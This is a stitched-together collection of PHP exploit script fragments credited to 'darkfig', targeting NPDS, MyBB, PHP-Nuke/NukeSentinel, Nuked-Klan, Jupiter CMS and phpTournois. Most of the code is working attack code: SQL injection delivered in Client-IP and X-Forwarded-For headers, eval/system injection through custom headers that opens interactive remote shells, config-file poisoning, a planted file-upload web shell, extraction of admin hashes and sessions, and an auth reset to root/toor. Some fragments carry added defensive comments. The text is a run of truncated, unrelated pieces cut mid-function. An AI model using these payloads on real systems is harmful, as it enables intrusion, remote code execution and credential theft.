/**
 * Interactive driver of this exploit script (the short `// ...` comments are
 * the original author's and are kept as written).
 *
 * Visible flow: create the phpsploit HTTP client, read the target URL and
 * optional proxy settings through get_p(), build the injected PHP string
 * $final once, then loop over cmd_prompt() until it returns false. Each
 * iteration places a base64-encoded system() call in a custom `MypCode`
 * request header, fetches `index.php?fields=<to_char($final)>,1` and prints
 * whatever lies between the two copies of the per-run separator in the
 * response body. Exits with status 1 when the separator is not found.
 *
 * What a defender can observe on the target side (all taken from the code
 * below, nothing else is assumed):
 *  - a non-standard request header named `MypCode` carrying base64 data;
 *  - a `fields` query parameter built by to_char() — that helper is not on
 *    this page, presumably a quote-free encoding of $final (verify against
 *    its definition) — whose decoded form contains
 *    `eval(base64_decode($_SERVER[HTTP_MYPCODE]))`;
 *  - a response body containing the same 32-hex md5 token twice.
 *
 * Depends on helpers defined elsewhere in the file: phpsploit, head, get_p,
 * cmd_prompt, add_slashes, to_char.
 */
function main()
{
    // :)
    $web = new phpsploit();
    $web->agent('Mozilla Firefox');
    // Hey ya :)
    head();
    // Target
    // get_p() with a truthy second argument presumably treats the parameter as required — not shown here.
    $url = get_p('url', true);
    // Proxy options
    $prh = get_p('proxhost');
    $pra = get_p('proxauth');
    // Use a proxy ?
    if ($prh) {
        // host:ip
        $web->proxy($prh);
        // Authentication
        if ($pra) {
            $web->proxyauth($pra);
        }
    }
    // Single quote bypass
    // Closes the quoted `(...)` context the author expects on the target side.
    $byp = "1');";
    // PHP code
    // The injected code reads its real payload from the HTTP_MYPCODE server variable, i.e. the `MypCode` header set in the loop below.
    $php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';
    // Separator
    // rand() is not cryptographically strong, but the token is only an output delimiter, not a secret.
    $s_sep = md5(rand(0, 1000000000) . 'HEY_YA');
    $c_sep = "print('{$s_sep}');";
    // Final PHP code
    // Layout: <closing quote> print(sep); eval(...); print(sep); exit();// — the trailing `//` comments out whatever follows on the target.
    $final = $byp . $c_sep . $php . $c_sep . 'exit();//';
    // Welcome guess !
    while (($cmd = cmd_prompt()) !== false) {
        // magic_quotes_gpc bypass
        // base64 keeps quotes and backslashes out of the raw header value; add_slashes() is defined elsewhere.
        $web->addheader('MypCode', base64_encode('system("' . add_slashes($cmd) . '");'));
        // Go =]
        $web->get($url . 'index.php?fields=' . to_char($final) . ',1');
        // Result
        // Anything between the two separator copies is the command output.
        $res = explode($s_sep, $web->getcontent());
        // Erf
        if (!isset($res[1])) {
            // Separator absent: the injected code did not run (or the response was not what was expected).
            print "\nFailed";
            exit(1);
        } else {
            if (empty($res[1])) {
                print "\nNo output: system() disabled OR cmd failed OR cmd without output";
            } else {
                print "\n" . $res[1];
            }
        }
    }
    return;
}
# 212. $file = fopen("config.php","w"); # 401. $content .= "\$perpage = $xperpage;\n"; # 402. $content .= "\$popular = $xpopular;\n";... # 614. fwrite($file, $content); # 615. fclose($file); # $PHPCODE = 'if(isset($_SERVER[HTTP_REFERER])) eval($_SERVER[HTTP_REFERER])'; # Default config value # You can get the config here ./admin.php?op=Configure # $config = array(frmdt_url => $url . 'admin.php', "xparse" => "1", "xgzhandler" => "0", "xfilemanager" => "0", "xadmin_cook_duration" => "240", "xuser_cook_duration" => "8000", "xsitename" => "NPDS SABLE", "xTitlesitename" => "NPDS - générateur de portail Php / Mysql en Open Source", "xnuke_url" => "http://www.npds.org", "xsite_logo" => "themes/Permanent-Double-Side/images/npds_p.gif", "xslogan" => "NPDS SABLE", "xstartdate" => "01/10/2005", "xtop" => "10;{$PHPCODE}", "xstoryhome" => "10", "xoldnum" => "10", "xultramode" => "1", "xanonymous" => "Anonyme", "xanonpost" => "0", "xtroll_limit" => "6", "xmod_admin_news" => "0", "xnot_admin_count" => "1", "xDefault_Theme" => "Permanent-Double-Side", "xstart_page" => "index.php?op=edito", "xlanguage" => "french", "xmulti_langue" => "false", "xlocale" => "french", "xlever" => "08:00", "xcoucher" => "20:00", "xgmt" => "", "xbanners" => "0", "xmyIP" => "1.1.1.100", "xfoot4" => "", "xbackend_title" => "NPDS", "xbackend_language" => "fr-FR", "xfoot1" => "Tous les Logos et Marques sont déposés, les commentaires sont sous la responsabilité de ceux qui les ont publiés, le reste @ npds.org", "xfoot2" => "Ce site a été construit avec <a href=http://www.npds.org CLASS=NOIR>NPDS</a>, un système de portail écrit en PHP. 
Ce logiciel est sous <a href=http://www.gnu.org CLASS=NOIR>GNU/GPL license</a>.", "xfoot3" => "syndication de vos News via <a href=http://www.votre_site/backend.php CLASS=NOIR>www.votre_site/backend.php</a> -::- + encore via le NPDS Push Infos System", "xbackend_image" => "", "xbackend_width" => "88", "xbackend_height" => "31", "xperpage" => "10", "xpopular" => "10", "xnewlinks" => "10", "xtoplinks" => "10", "xlinksresults" => "10", "xlinks_anonaddlinklock" => "0", "xlinkmainlogo" => "0", "xOnCatNewLink" => "1", "xadminmail" => "", "xmail_fonction" => "1", "xEmailFooter" => "", "xnotify" => "0", "xnotify_email" => "*****@*****.**", "xnotify_subject" => "Nouvelle soumission", "xnotify_message" => "Le site a recu une nouvelle soumission !", "xnotify_from" => "webmaster", "xmoderate" => "1", "xcommentlimit" => "4096", "xmaxOptions" => "12", "xBarScale" => "1", "xsetCookies" => "1", "xpollcomm" => "1", "xtipath" => "themes/Permanent-Double-Side/images/topics/", "xuserimg" => "/themes/Permanent-Double-Side/images/menu/", "xadminimg" => "images/admin/", "xadmingraphic" => "0", "xadmf_ext" => "gif", "xshort_menu_admin" => "1", "xsite_font" => "Verdana, Arial, Helvetica", "xadmart" => "10", "xminpass" => "5", "xshow_user" => "20", "xsmilies" => "1", "xavatar_size" => "60*80", "xshort_user" => "0", "xAutoRegUser" => "1", "xmemberpass" => "1", "xsubscribe" => "1", "xmember_invisible" => "0", "xCloseRegUser" => "0", "xhttpref" => "1", "xhttprefmax" => "1000", "xmember_list" => "0", "xdownload_cat" => "Tous", "xshort_review" => "0", "xrss_host_verif" => "false", "xcache_verif" => "true", "xdns_verif" => "false", "xsavemysql_size" => "256", "xsavemysql_mode" => "1", "xtiny_mce" => "true", "op" => "ConfigSave"); # 0_o my website has been reset # $xpl->formdata($config); while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) { $xpl->addheader("Referer", "@system({$cmd});die;"); $xpl->get($url . 'config.php'); print $xpl->getcontent() . 
"\n\$shell> "; } function getparam($param, $opt = '') { global $argv; foreach ($argv as $value => $key) { if ($key == '-' . $param) { return $argv[$value + 1]; } } if ($opt) { exit("\n-{$param} parameter required"); } else { return;
} $xpl->post($url . 'myadmin.php?action=create', "title={$name}&filename={$name}&passwd=&style=" . $styles[1] . "&structure=1&subject="); $xpl->get($url . 'myadmin.php?choix=1'); if (!preg_match_all("#action=hide_forum&id=([0-9]+)#", $xpl->getcontent(), $fid)) { die("\nsploit> Can't retrieve the forum id"); } $forumid = $fid[1][count($fid[1]) - 1]; $xpl->get($url . "myadmin.php?choix=1&action=hide_forum&id={$forumid}"); print "\nsploit> Done\nstatus> Trying to include the picture\n\$shell> "; if (empty($avatarur)) { $avatarur = "./avatar/{$name}.jpg"; } $xpl->post($url . "myadmin.php?action=rec_perso&id={$forumid}&choix=3", "PARAM%5Btop_url%5D={$avatarur}"); $xpl->reset(); while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) { $xpl->addheader("Referer", $cmd); $xpl->get($url . $name . '.php'); $data = explode("337666733", $xpl->getcontent()); print $data[1] . "\n\$shell> "; } /* * * Copyright (C) darkfig * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of
if ($pra) { $xpl->proxyauth($pra); } print "0x01>Deleting the file auth.inc.php"; $xpl->post($url . 'dirsys/modules/auth.php', 'suppr=1'); print "\n0x02>Creating the file auth.inc.php"; $xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor'); print "\n0x03>Trying to log in as Administrator"; $xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor'); // Minimum data necessary (fwrite without quote) $minimdata = 'WIDTH_TREE_FRAME=1&FRAME_BORDER=1&WIDTH_FRAME_BORDER=1&WIDTH_FRAME_SP' . 'ACING=1&SCROLING_TREE_FRAME=1&RESIZE_FRAME=1&WIDTH_TD_SIZE=1&WIDTH_TD' . '_TYPE=1&WIDTH_TD_DATE=1&STYLE=1&TOTALSIZE=1&CHECK_MAJ=1&IMAGE_BROWSER' . '=1&IMAGE_TN=1&GD2=1&IMAGE_JPG=1&IMAGE_GIF=1&IMAGE_BMP=1&IMAGE_TN_SIZE' . '=1&IMAGE_TN_COMPRESSION=1&NB_COLL_TN=1&EXIF_READER=1&SLIDE_SHOW=1&DEB' . 'UG=0;' . urlencode($cod) . '//&SLIDE_SHOW_INT=1&BACK=1&WRITE_TN=1&AUTO_RE' . 'SIZE=1&DETAILS=1&DIRINFO_LIFE=1&activer_Message=1'; print "\n0x04>Creating the file config.inc.php"; $xpl->post($url . 'dirsys/modules/config/post.php', $minimdata); print "\n0x05>Now enter your commands"; do { $xpl->addheader('Shell', "@system({$cmd});"); $xpl->get($url . 'dirsys/config.inc.php'); print $xpl->getcontent() . "\n0x06>"; } while (!eregi('^quit|exit$', $cmd = trim(fgets(STDIN)))); exit(0); function getparam($param, $opt = '') { global $argv; foreach ($argv as $value => $key) { if ($key == '-' . $param) { return $argv[$value + 1]; } } if ($opt) { usage(); } else {
# dateline: 1175443967 # lastactive: 1175444369 # # $xpl->addheader('Client-IP','127.0.0.1'); # $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9'); # print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel... # # I decided to use the solution number 2. # We can also add an administrator (easily) ... but it's not interesting. # print "\nAdmin IP : "; $ip = sql_inject('ip'); print "\nAdmin sid: "; $sid = sql_inject('sid'); print "\nTrying to be logged in as administrator"; $xpl->addheader('Client-IP', $ip); $xpl->get($url . "admin/languages.php?adminsid={$sid}"); # Trying to find the language if (preg_match('#<input type="hidden" name="lang" value="(\\S*)"#', $xpl->getcontent(), $langmatches)) { $lang = $langmatches[1]; } else { $lang = 'english'; } print "\nLanguage: {$lang}"; # Language configuration $xpl->get($url . "admin/languages.php?adminsid={$sid}&action=edit&lang={$lang}&editwith=0&file={$filetoed}"); preg_match_all('#name="(.*)">(.*)</textarea>#', $xpl->getcontent(), $name_value); # We can't use: # - <? OR <?php # - <script language="php"> # - ' OR "
$xpl->proxyauth($authp); } # +nukesentinel.php # 49. if($ab_config['disable_switch'] > 0) { return; } # 414. if($ab_config['track_active'] == 1 AND !is_excluded($nsnst_const['remote_ip'])) { # 458. $db->sql_query("INSERT INTO `".$prefix."_nsnst_tracked_ips` (`user_id`, `username`, `date`, `ip_addr`, `ip_long`, `page`, # `user_agent`, `refered_from`, `x_forward_for`, `client_ip`, `remote_addr`, `remote_port`, `request_method`, # `c2c`) VALUES ('".$nsnst_const['ban_user_id']."', '$ban_username2', '".$nsnst_const['ban_time']."', # '".$nsnst_const['remote_ip']."', '".$nsnst_const['remote_long']."', '$pg', '$user_agent', '$refered_from', # '".$nsnst_const['forward_ip']."', '".$nsnst_const['client_ip']."', '".$nsnst_const['remote_addr']."', # '".$nsnst_const['remote_port']."', '".$nsnst_const['request_method']."', '$c2c')"); # # We insert a row in $prefix."_nsnst_tracked_ips". # print "\nInserting a row in {$prfix}_nsnst_tracked_ips"; $xpl->addheader("Client-IP", "255.255.255.255"); $xpl->get($url . 'index.php'); # Trying to find a valid tid. # Needed for $tum > 0. # print "\nTrying to find a valid tid (max hits={$nbtst})"; $sql = "' OR 1=1#"; $xpl->addcookie("admin", urlencode(base64_encode($sql . ':1:'))); for ($c = $tid; $c <= $nbtst; $c++) { $xpl->get($url . "includes/nsbypass.php?tid={$c}"); if (!preg_match("#phpnuke.org#", $xpl->getheader())) { $tid = $c; print "\nValid tid found: {$tid}\nHash: {$login} -> "; break; } if ($c == $nbtst) {
} if (preg_match('#<span style="float: right;" ><img src="([^"]+)#i', $xpl->get($url . '?page=joueurs&id=1'), $match)) { $img = $match[1]; } else { die(" * can't find image name\n"); } /* Change homepage to our avatar, with a null byte, after saving website name. */ print " * changing homepage\t"; preg_match('#name=nomsite value="([^ ]+)"#i', $xpl->get($url . '?page=configuration&op=admin'), $all); $postdata = "nomsite={$all['1']}&urlsite={$url}&logo=logo.gif&pagestart=../.{$img}%00&inscription_joueur=1&inscription_equipe=1&places=200&emailcontact=&emailinscription=&langue=english&theme=phptournois&gzip=1&poulewin=3&poulenull=2&pouleloose=1&poulefor=0&information=®lement=&decharge=&shoutbox=1&shoutlimit=20&shoutboxc=255&news=1&ladder=1&messagerie=1&support=0&faq=1&serveur=1&download=1&liens=1&galerie=1&livredor=1&sponsors=0&partenaires=1&forum=1&contact=1&horloge=1&commande=1&avatar=A&avatar_upload=1&avatar_remote=1&avatar_gallerie=0&avatar_filesize_max=100000&avatar_x_max=80&avatar_y_max=80&irc=1&ircserver=euroserv.fr.quakenet.org&ircport=6667&ircpassword=&ircchannels=%23phptournois+%23lan+%23lan.cs+%23lan.q3&mail=N&smtpserver=&smtpuser=&smtppassword="******"done\n"; $success = true; if ($mode == 0) { print " * loading uploader\t"; $xpl->addheader("upload", "1"); if (preg_match("#upfiledone#i", $xpl->get($url))) { print "done\n"; } else { $success = false; print "error\n"; } } else { print "\n\$shell> "; while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) { $xpl->reset('header'); $xpl->addheader('Shell', "system('{$cmd}');"); $xpl->get($url); $data = explode('123456789', $xpl->getcontent()); print $data[1] . "\n\$shell> "; }
$mode = getparam("mode") ? getparam("mode") : 0; $adm = getparam("admin"); $acc = getparam("user"); $prx = getparam("proxy"); $prefix = getparam("prefix") ? getparam("prefix") : "nuked_"; $file_upload_code = getparam("file") ? file_get_contents(getparam("file")) : '<?php if(isset($_POST[\'upload\'])) { if( !move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], "./".$_FILES[\'file\'][\'name\'])) echo("<center>Error ".$_FILES[\'file\'][\'error\']."</center>");else echo "<center>File uploaded</center>"; } ?><form method="post" enctype="multipart/form-data"><center><input type="file" name="file"><input type="submit" name="upload" value="Upload"></center></form>'; $date = array(date('Y'), date('m'), date('d')); $xpl = new phpsploit(); if ($prx) { $xpl->proxy($prx); } /* Admin account defined */ if ($adm) { print "[*] Using admin account {$adm}\n"; list($login, $passwd) = explode(":", $adm); $xpl->addheader("Referer", $url); $c = $xpl->post($url . "index.php?file=User&{$prefix}nude=index&op=login", "pseudo={$login}&pass={$passwd}&remember_me=ok"); if (preg_match("#{$prefix}sess_id=([a-z0-9]+)#i", $c, $sid) && preg_match("#uid=([a-z0-9]+)#i", $c, $uid)) { $admin_sid = $sid[1]; $admin_uid = $uid[1]; print " SID -> {$admin_sid}\n"; print " UID -> {$admin_uid}\n"; finalattack($admin_sid, $admin_uid); } else { exit("[*] Can't log in\n"); } } else { /* User account defined */ if ($acc) { print "[*] Using user account {$acc}\n"; list($login, $passwd) = explode(":", $acc);
<?php
/*
Title: Jupiter CMS 1.1.5 SQL Injection Vulnerability
Advisory ID: 12070214
Risk level: High
Author: DarkFig <*****@*****.**>
URL: http://www.acid-root.new.fr/advisories/12070214.txt
*/

// Script body: one request, one response, two regex extractions.
// Notices are hidden, so a missing match below fails silently rather than loudly.
error_reporting(E_ALL ^ E_NOTICE);
$url = 'http://localhost/jupiter/';
// phpsploit is defined elsewhere, not on this page.
$xpl = new phpsploit();
$xpl->agent("Mozilla");
// The injected SQL. The [BEGIN_XPL_*]/[END_XPL_*] strings are only markers used to locate
// the two selected columns in the returned page.
$hev = "-1' UNION SELECT CONCAT('" . "[BEGIN_XPL_USER]'," . "(SELECT username FROM users LIMIT 0,1),'" . "[END_XPL_USER]','" . "[BEGIN_XPL_PWD]'," . "(SELECT password FROM users LIMIT 0,1),'" . "[END_XPL_PWD]'),1 #";
// The injection travels in the Client-IP request header — a non-standard header
// containing `UNION SELECT` is the obvious thing to alert on at the edge.
$xpl->addheader("Client-IP", $hev);
$xpl->get($url);
// Return values of preg_match() are not checked: on a non-vulnerable target $usr/$pwd
// stay empty and the print below emits just '::' (plus an undefined-offset diagnostic,
// hidden for E_NOTICE by the error_reporting() call above).
preg_match("#\\[BEGIN_XPL_USER\\](.*)\\[END_XPL_USER\\]#", $xpl->getcontent(), $usr);
// The password pattern pins exactly 32 chars of [a-z0-9] — the shape of a hex digest, presumably md5.
preg_match("#\\[BEGIN_XPL_PWD\\]([a-z0-9]{32})\\[END_XPL_PWD\\]#", $xpl->getcontent(), $pwd);
print $usr[1] . '::' . $pwd[1];
/*
 *
 * Copyright (C) darkfig
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License
 * as published by the Free Software Foundation; either version 2
 * of the License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
$config[] = 'nuked'; # cookie prefix $config[] = 'ORDER by date LIMIT 1'; # sql conditions $config[] = 'HAK'; # match, length <= 3 $config[] = '<?php' . "\n" . 'error_reporting(0);' . 'if(isset($_SERVER[HTTP_SHELL]))' . '{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' . 'else {include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\';} ?>'; $request = array(); $request[] = "'{$config['3']}0',(SELECT pseudo FROM {$config['0']}_users {$config['2']}),'{$config['3']}0'"; $request[] = "'{$config['3']}1',(SELECT pass FROM {$config['0']}_users {$config['2']}),'{$config['3']}1'"; $request[] = "'{$config['3']}2',(SELECT id FROM {$config['0']}_users {$config['2']}),'{$config['3']}2'"; $request[] = "'{$config['3']}3',(SELECT id FROM {$config['0']}_sessions WHERE user_id=(SELECT id FROM {$config['0']}_users {$config['2']})),'{$config['3']}3'"; for ($i = 0; $i < count($request); $i++) { $deb = rand(0, 10000) . "',2," . (time() + 500000) . ",'',(SELECT CONCAT("; $sql = $deb . $request[$i] . "))) #"; $xpl->addheader("X-Forwarded-For", $sql); $xpl->get($url); $xpl->reset('header'); } if (!preg_match_all("#{$config['3']}([0123]{1})(\\S*){$config['3']}([0123]{1})#", $xpl->getcontent(), $matches)) { die("Exploit Failed"); } $what = array("login", "passwd", "user_id", "session"); for ($i = 0; $i < count($what); $i++) { print "\n" . $what[$i] . " -> " . $matches[2][$i]; } if (empty($matches[2][3])) { exit("\nNo session found"); } # Logged in as admin $name = array("admin_session", "user_id", "sess_id");
# 1056. $display_page = abget_template($blocker_row['template']); // $blocker_row['template'] ... 6,7,--->'../config.php'<---,9
#
#
# 1004. function abget_template($template="") {
# 1013. $filename = "abuse/".$template; // $template = ../config.php
# 1014. if(!file_exists($filename)) { $filename = "abuse/abuse_default.tpl"; }
# 1015. $handle = @fopen($filename, "r");
# 1016. $display_page = fread($handle, filesize($filename));
# 1017. @fclose($handle);
# 1041. return $display_page;
# 1042. }
#
# Interesting isn't it ? :]
#
# The inner query is wrapped in mysqlchar() so it contains no quote characters; the
# trailing `#255.255.255.255` comments out the remainder of the target's query.
$sql = "' UNION SELECT 1,2,3,4,5,6,7," . mysqlchar("' UNION SELECT -666,2,3,4,5,6,7,'../{$file}',9,10,11 ORDER BY blocker #") . ",9,10,11,12,13,14,15,16,17,18#255.255.255.255";
# Delivered through the Client-IP request header — that header carrying `UNION SELECT`
# or a long CHAR(...) list is the signature to detect.
$xpl->addheader("Client-IP", $sql);
$xpl->get($url . 'index.php');
print $xpl->getcontent();

/**
 * Rewrites $data as a MySQL CHAR(...) expression listing each byte's code,
 * e.g. mysqlchar('ab') gives 'CHAR(97,98)'; the empty string gives 'CHAR()'.
 * Byte-wise (strlen/ord), so multibyte input is emitted one byte at a time.
 * Its only purpose here is to embed a string in the injected query without
 * quote characters — which is exactly why WAF/IDS rules treat long CHAR()
 * sequences in request data as an injection indicator.
 *
 * @param string $data raw string to encode
 * @return string      the CHAR(...) expression
 */
function mysqlchar($data)
{
    $char = 'CHAR(';
    for ($i = 0; $i < strlen($data); $i++) {
        $char .= ord($data[$i]);
        // comma between codes, none after the last one
        if ($i != strlen($data) - 1) {
            $char .= ',';
        }
    }
    return $char . ')';
}
function getparam($param, $opt = '') {